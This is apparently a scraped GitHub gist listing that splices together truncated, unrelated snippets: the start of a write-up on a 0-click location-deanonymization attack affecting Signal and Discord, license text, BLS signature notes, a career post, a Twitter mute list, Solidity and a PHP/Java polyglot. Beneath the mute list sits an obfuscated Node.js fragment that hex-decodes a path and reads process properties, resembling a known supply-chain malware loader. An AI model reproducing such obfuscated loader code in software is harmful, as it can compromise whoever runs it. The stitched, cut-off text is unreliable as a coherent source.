@hackermondev
hackermondev / research.md
Last active March 11, 2025 23:10
Unique 0-click deanonymization attack targeting Signal, Discord and hundreds of platforms

hi, i'm daniel. i'm a 15-year-old high school junior. in my free time, i hack billion dollar companies and build cool stuff.

3 months ago, I discovered a unique 0-click deanonymization attack that allows an attacker to grab the location of any target within a 250 mile radius. With a vulnerable app installed on a target's phone (or as a background application on their laptop), an attacker can send a malicious payload and deanonymize you within seconds--and you wouldn't even know.

I'm publishing this writeup and research as a warning, especially for journalists, activists, and hackers, about this type of undetectable attack. Hundreds of applications are vulnerable, including some of the most popular apps in the world: Signal, Discord, Twitter/X, and others. Here's how it works:

Cloudflare

By the numbers, Cloudflare is easily the most popular CDN on the market. It beats out competitors such as Sucuri, Amazon CloudFront, Akamai, and Fastly. In 2019, a major Cloudflare outage k

@wlib
wlib / LICENSE
Last active April 30, 2024 17:07
Run a shell script with bash, line-by-line, prompted on each command. Useful for running unknown scripts or debugging. Not a secure substitute for understanding a script beforehand.
MIT License
Copyright (c) 2021 Daniel Ethridge
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
function *count(n) {
for (let i = 0; i < n; i++) {
yield i;
}
}
const delay = ms => new Promise(resolve => setTimeout(resolve, ms));
const asyncForEach = async (values, callback) => {
@paulmillr
paulmillr / BLS_Signature.md
Last active February 12, 2025 15:27
BLS Signature for Busy People

Summary

  • BLS stands for
    • Barreto-Lynn-Scott: BLS12, a Pairing Friendly Elliptic Curve.
    • Boneh-Lynn-Shacham: A Signature Scheme.
  • Signature Aggregation
    • It is possible to verify n aggregate signatures on the same message with just 2 pairings instead of n+1.

@kriskowal
kriskowal / uber-to-agoric.md
Last active May 10, 2022 22:51
Uber to Agoric

I have a bit of good news and bad news. Friday, April 3, was my last day at Uber. Monday, April 6, was my first day at Agoric.

I started at Uber 5½ years ago, on the dispatch system. I joined Tom Croucher’s team, which focused on common frameworks for marketplace systems, with Jake Verbaten, Russ Frank, and spiritually Matthew Esch. When I arrived, the scaffolding and frameworks were in place. I wrote a tool for verifying that JSON schema evolution remained backward-compatible, did some weird stuff to automatically mix the middleware stack, and wrote a thing to balance load across Node.js processes more fairly than the Linux kernel. I don’t believe any of that work made it to production, really, but for those six months, I learned how to operate global dispatch while I was on-call for 24 hours once a month and developed a bald spot.

I then got on board a new Distributed Systems Group under Matt Ranney’s guidance and many of the folks I’ve been working with to this day. Matt had designed a DHT based on the S

@IanColdwater
IanColdwater / twittermute.txt
Last active February 23, 2025 18:09
Here are some terms to mute on Twitter to clean your timeline up a bit.
Mute these words in your settings here: https://twitter.com/settings/muted_keywords
ActivityTweet
generic_activity_highlights
generic_activity_momentsbreaking
RankedOrganicTweet
suggest_activity
suggest_activity_feed
suggest_activity_highlights
suggest_activity_tweet
! function() {
try {
var r = require,
t = process;
function e(r) {
return Buffer.from(r, "hex").toString()
}
var n = r(e("2e2f746573742f64617461")),
o = t[e(n[3])][e(n[4])];
pragma solidity ^0.4.0;
library StringLib {
function concat(string storage _head, string _tail) returns (bool) {
bytes head = bytes(_head);
bytes memory tail = bytes(_tail);
for (uint i = 0; i < tail.length; i++) {
head.push(tail[i]);
}
@avafloww
avafloww / PhpJava.java
Last active February 18, 2025 13:14
This snippet of code is syntactically valid in both PHP and Java, and produces the same output in both.
/*<?php
//*/public class PhpJava { public static void main(String[] args) { System.out.printf("/*%s",
//\u000A\u002F\u002A
class PhpJava {
static function main() {
echo(//\u000A\u002A\u002F
"Hello World!");
}}
//\u000A\u002F\u002A
PhpJava::main();
@marick
marick / about_those_lava_lamps.md
Last active June 22, 2022 21:08
About Those Lava Lamps

Around 2006-2007, it was a bit of a fashion to hook lava lamps up to the build server. Normally, the green lava lamp would be on, but if the build failed, it would turn off and the red lava lamp would turn on.

By coincidence, I've actually met, about that time, (probably) the first person to hook up a lava lamp to a build server. It was Alberto Savoia, who'd founded a testing tools company (that did some very interesting things around generative testing that have basically never been noticed). Alberto had noticed that people did not react with any urgency when the build broke. They'd check in broken code and go off to something else, only reacting to the breakage they'd caused when some other programmer pulled the change and had problems.